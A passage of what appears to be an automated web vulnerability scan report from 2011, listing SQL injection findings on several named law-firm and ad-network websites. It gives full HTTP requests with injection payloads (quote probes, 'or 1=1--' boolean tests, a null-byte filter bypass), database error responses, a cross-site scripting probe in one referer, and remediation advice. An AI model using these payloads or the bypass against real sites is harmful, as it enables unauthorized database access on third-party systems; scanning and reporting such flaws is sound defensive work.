GET /red/psi/sites/www.tydingslaw.com/p.json?callback=_ate.ad.hpr&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.tydingslaw.com%2FContent.aspx%3Ftopic%3DAnother_Thorn_in_Creditors_Sides_New_Case_Makes_Preference_Payments_Easier_to_Claw_Back&ref=http%3A%2F%2Fwww.tydingslaw.com%2FPracticesIndustries%2Fpid%2F7%2FCommercial-and-Business-Litigation-.aspx&3vpnn2 HTTP/1.1
Host: ds.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3; psc=4; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X'%20and%201%3d1--%20; di=1305201657.1OD|1305200976.1FE|1305200976.60; uit=1

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 510
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Thu, 12 May 2011 16:12:04 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 11 Jun 2011 16:12:04 GMT; Path=/
Set-Cookie: di=%7B%7D..1305216724.1FE|1305216724.1OD|1305216724.60; Domain=.addthis.com; Expires=Sat, 11-May-2013 16:11:57 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Thu, 12 May 2011 16:12:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 16:12:04 GMT
Connection: close

_ate.ad.hpr({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4dc048d9159e4ae3","http://xcdn.xgraph.net/15530/db/xg.gif?pid=15530&sid=10001&type=db&p_bid=4dc048d9159e4ae3","http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4dc048d9159e4ae3&curl=http%3a%2f%2fwww.tydingslaw.com%2fContent.aspx%3ftopic%3dAnother_Thorn_in_Creditors_Sides_New_Case_Makes_Preference_Payments_Easier_to_Claw_Back"],"segments" : ["1FE","1OD","60"],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

Request 2

GET /red/psi/sites/www.tydingslaw.com/p.json?callback=_ate.ad.hpr&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.tydingslaw.com%2FContent.aspx%3Ftopic%3DAnother_Thorn_in_Creditors_Sides_New_Case_Makes_Preference_Payments_Easier_to_Claw_Back&ref=http%3A%2F%2Fwww.tydingslaw.com%2FPracticesIndustries%2Fpid%2F7%2FCommercial-and-Business-Litigation-.aspx&3vpnn2 HTTP/1.1
Host: ds.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3; psc=4; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X'%20and%201%3d2--%20; di=1305201657.1OD|1305200976.1FE|1305200976.60; uit=1

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 412
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Thu, 12 May 2011 16:12:04 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 11 Jun 2011 16:12:04 GMT; Path=/
Set-Cookie: di=%7B%7D..1305216724.1FE|1305216724.60; Domain=.addthis.com; Expires=Sat, 11-May-2013 16:11:57 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Thu, 12 May 2011 16:12:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 16:12:04 GMT
Connection: close

_ate.ad.hpr({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4dc048d9159e4ae3","http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4dc048d9159e4ae3&curl=http%3a%2f%2fwww.tydingslaw.com%2fContent.aspx%3ftopic%3dAnother_Thorn_in_Creditors_Sides_New_Case_Makes_Preference_Payments_Easier_to_Claw_Back"],"segments" : ["1FE","60"],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})
1.2. http://layserfreiwald.com/attorneys.html [AID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://layserfreiwald.com
Path:   /attorneys.html

Issue detail

The AID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the AID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /attorneys.html?mode=view&AID=8' HTTP/1.1
Host: layserfreiwald.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://layserfreiwald.com/
Cookie: CFID=8b46ceb8%2Df5f2%2D4810%2D8dca%2Db8cba45aa5c4; CFTOKEN=0; vt=u; __utma=146588073.159810427.1305223741.1305223741.1305223741.1; __utmb=146588073.1.10.1305223741; __utmc=146588073; __utmz=146588073.1305223741.1.1.utmcsr=elawmarketing.com|utmccn=(referral)|utmcmd=referral|utmcct=/portfolio/websites/layser-freiwald

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Thu, 12 May 2011 18:13:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Content-Length: 7379
Content-Type: text/html; charset=UTF-8

<!-- Railo [3.2.2.000] Error -->


<script>

var plus='data:image/gif;base64,R0lGODlhCQAJAIABAAAAAP///yH5BAEAAAEALAAAAAAJAAkAAAIRhI+hG7bwoJINIktzjizeUwAAOw==';
var minus='data
...[SNIP]...
<td style="border : 1px solid #350606;background-color :#FFCC00;">Line 4: Incorrect syntax near ''.</td>
...[SNIP]...
1.3. http://www.mccarter.com/new/biosnew.aspx [Initial parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mccarter.com
Path:   /new/biosnew.aspx

Issue detail

The Initial parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Initial parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /new/biosnew.aspx?ShowLast=True&Initial=H' HTTP/1.1
Host: www.mccarter.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mccarter.com/new/biosnew.aspx?search=&Location=
Cookie: ASPSESSIONIDQCACQABB=OKLLAFKBNJLCBGNOEOBIADKB; ASP.NET_SessionId=xsyokce4xrhmr5452u2baz45

Response 1

HTTP/1.1 500 Internal Server Error
Date: Thu, 12 May 2011 18:05:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6305

<html>
<head>
<title>Unclosed quotation mark after the character string ')ORDER BY dbo.Bios.[Last], dbo.Bios.[First]'.
Incorrect syntax near ')ORDER BY dbo.Bios.[Last], dbo.Bios.[First]'.</title>
...[SNIP]...

Request 2

GET /new/biosnew.aspx?ShowLast=True&Initial=H'' HTTP/1.1
Host: www.mccarter.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mccarter.com/new/biosnew.aspx?search=&Location=
Cookie: ASPSESSIONIDQCACQABB=OKLLAFKBNJLCBGNOEOBIADKB; ASP.NET_SessionId=xsyokce4xrhmr5452u2baz45

Response 2

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:05:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 26603


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<HTML>
   <HEAD>
       
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<META NAME="ROBOTS" CONTENT="NOYDIR,N
...[SNIP]...
1.4. http://www.mccarter.com/new/homenew.aspx [show parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mccarter.com
Path:   /new/homenew.aspx

Issue detail

The show parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the show parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /new/homenew.aspx?searchlink=showlocationnew.aspx&show=1433%00' HTTP/1.1
Host: www.mccarter.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mccarter.com/new/homenew.aspx?9c236--%3E%3Cscript%3Ealert(%22OOPS%22)%3C/script%3Eec7143486da=1
Cookie: ASPSESSIONIDQCACQABB=OKLLAFKBNJLCBGNOEOBIADKB; ASP.NET_SessionId=xsyokce4xrhmr5452u2baz45

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 12 May 2011 16:17:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4745

<html>
<head>
<title>Unclosed quotation mark after the character string ''.</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;
...[SNIP]...
1.5. http://www.mccarter.com/new/showbionew.aspx [show parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mccarter.com
Path:   /new/showbionew.aspx

Issue detail

The show parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the show parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /new/showbionew.aspx?show=997'&Related= HTTP/1.1
Host: www.mccarter.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mccarter.com/new/homenew.aspx?searchlink=showbionew&show=997
Cookie: ASPSESSIONIDQCACQABB=OKLLAFKBNJLCBGNOEOBIADKB; ASP.NET_SessionId=xsyokce4xrhmr5452u2baz45

Response 1

HTTP/1.1 500 Internal Server Error
Date: Thu, 12 May 2011 16:17:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4643

<html>
<head>
<title>Unclosed quotation mark after the character string '997''.
Incorrect syntax near '997''.</title>
<style>
   body {font-family:"Verdana";font-weight:
...[SNIP]...

Request 2

GET /new/showbionew.aspx?show=997''&Related= HTTP/1.1
Host: www.mccarter.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mccarter.com/new/homenew.aspx?searchlink=showbionew&show=997
Cookie: ASPSESSIONIDQCACQABB=OKLLAFKBNJLCBGNOEOBIADKB; ASP.NET_SessionId=xsyokce4xrhmr5452u2baz45

Response 2

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 16:17:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: /new/biosnew.aspx
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 134

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='/new/biosnew.aspx'>here</a>.</h2>
</body></html>
1.6. http://www.mccarter.com/new/showcareerpagenew.aspx [show parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mccarter.com
Path:   /new/showcareerpagenew.aspx

Issue detail

The show parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the show parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /new/showcareerpagenew.aspx?show=1284%00' HTTP/1.1
Host: www.mccarter.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mccarter.com/new/homenew.aspx?searchlink=showcareerpagenew.aspx&show=1284
Cookie: ASPSESSIONIDQCACQABB=OKLLAFKBNJLCBGNOEOBIADKB; ASP.NET_SessionId=xsyokce4xrhmr5452u2baz45

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 12 May 2011 16:16:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4482

<html>
<head>
<title>Unclosed quotation mark after the character string ''.</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;
...[SNIP]...
1.7. http://www.mccarter.com/new/showeventnew.aspx [show parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mccarter.com
Path:   /new/showeventnew.aspx

Issue detail

The show parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the show parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /new/showeventnew.aspx?show=6164%00' HTTP/1.1
Host: www.mccarter.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mccarter.com/new/eventsnew.aspx
Cookie: ASPSESSIONIDQCACQABB=OKLLAFKBNJLCBGNOEOBIADKB; ASP.NET_SessionId=xsyokce4xrhmr5452u2baz45

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 12 May 2011 16:17:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4602

<html>
<head>
<title>Unclosed quotation mark after the character string ' order by [startdate] desc'.</title>
<style>
   body {font-family:"Verdana";font-weight:normal;fo
...[SNIP]...
1.8. http://www.mccarter.com/new/showlocationnew.aspx [show parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mccarter.com
Path:   /new/showlocationnew.aspx

Issue detail

The show parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the show parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /new/showlocationnew.aspx?show=1433' HTTP/1.1
Host: www.mccarter.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mccarter.com/new/homenew.aspx?searchlink=showlocationnew.aspx&show=1433
Cookie: ASPSESSIONIDQCACQABB=OKLLAFKBNJLCBGNOEOBIADKB; ASP.NET_SessionId=xsyokce4xrhmr5452u2baz45

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 12 May 2011 16:16:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4478

<html>
<head>
<title>Unclosed quotation mark after the character string ''.</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;
...[SNIP]...
1.9. http://www.peckshaffer.com/bonds.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.peckshaffer.com
Path:   /bonds.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /bonds.php?page=/1'news HTTP/1.1
Host: www.peckshaffer.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.peckshaffer.com/home.php

Response 1

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:46:32 GMT
Server: Apache/2.0.46 (Red Hat)
X-Powered-By: PHP/4.4.2
Content-Length: 319
Connection: close
Content-Type: text/html; charset=UTF-8

<!-- Bonds : Start -->


error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'news' LIMIT 1' at line 1 | 1064<BR>
...[SNIP]...

Request 2

GET /bonds.php?page=/1''news HTTP/1.1
Host: www.peckshaffer.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.peckshaffer.com/home.php

Response 2

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:46:32 GMT
Server: Apache/2.0.46 (Red Hat)
X-Powered-By: PHP/4.4.2
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15196

<!-- Bonds : Start -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www
...[SNIP]...
1.10. http://www.peckshaffer.com/bonds.php [page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.peckshaffer.com
Path:   /bonds.php

Issue detail

The page parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the page parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /bonds.php?page=news' HTTP/1.1
Host: www.peckshaffer.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.peckshaffer.com/home.php

Response 1

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:46:23 GMT
Server: Apache/2.0.46 (Red Hat)
X-Powered-By: PHP/4.4.2
Content-Length: 324
Connection: close
Content-Type: text/html; charset=UTF-8

<!-- Bonds : Start -->


error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''bond news'' LIMIT 1' at line 1 | 1064<BR>
...[SNIP]...

Request 2

GET /bonds.php?page=news'' HTTP/1.1
Host: www.peckshaffer.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.peckshaffer.com/home.php

Response 2

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:46:23 GMT
Server: Apache/2.0.46 (Red Hat)
X-Powered-By: PHP/4.4.2
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15196

<!-- Bonds : Start -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www
...[SNIP]...
1.11. http://www.pillsburylaw.com/ [CFID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /

Issue detail

The CFID cookie appears to be vulnerable to SQL injection attacks. The payloads 20752209%20or%201%3d1--%20 and 20752209%20or%201%3d2--%20 were each submitted in the CFID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/6
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=1181953720752209%20or%201%3d1--%20; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 19:51:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=;expires=Wed, 12-May-2010 19:51:08 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/6
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=1181953720752209%20or%201%3d2--%20; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11825829;path=/
Set-Cookie: CFTOKEN=73112688;path=/
Date: Thu, 12 May 2011 19:51:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
